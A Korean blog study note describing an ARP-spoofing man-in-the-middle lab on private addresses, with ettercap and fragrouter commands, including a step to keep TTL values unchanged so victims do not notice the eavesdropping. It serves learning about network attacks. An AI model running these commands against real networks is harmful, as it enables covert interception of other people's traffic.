IP 설정
XP : 10.10.10.10/24
BackTrack : 10.10.10.20/24
CentOS6 : 10.10.10.30/24
 
스푸핑을 하게 되면 BT를 거쳐가야하기 때문에 TTL값이 1이 줄어들게 된다.
도청당하고 있다는 사실을 TTL값으로 눈치 챌수 있기 때문에 fragrouter 명령을 사용하여 TTL값도 조작한다.
 
커널 포워딩
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
//운영체제 자체가 제공

TTL값이 1줄어든다.
 
root@bt:~# fragrouter -B1
//TTL 값이 줄지 않고 유지 된다.

 

ettercap
arp스푸핑을 이용해서 xpcentos를 속이고 포워딩도 자동으로 해준다.
MITM 상황을 자동으로 만들어 줌
root@bt:~# ettercap -T -M arp /10.10.10.10/ /10.10.10.30/

 

wireshark를 통해 자동으로 arp패킷을 보내는 것을 확인 할 수 있다.

ARP
1.state less
2.인증체계가 없다.

'정보보안 > Network' 카테고리의 다른 글

DNS Spoofing,파밍  (383) 2020.08.02
DHCP Starvation 공격(DOS공격 중 하나)  (312) 2020.08.02
DHCP Spoofing  (357) 2020.08.02
Active Sniffing  (344) 2020.08.02
네트워크 기본  (731) 2020.08.02

+ Recent posts

티스토리툴바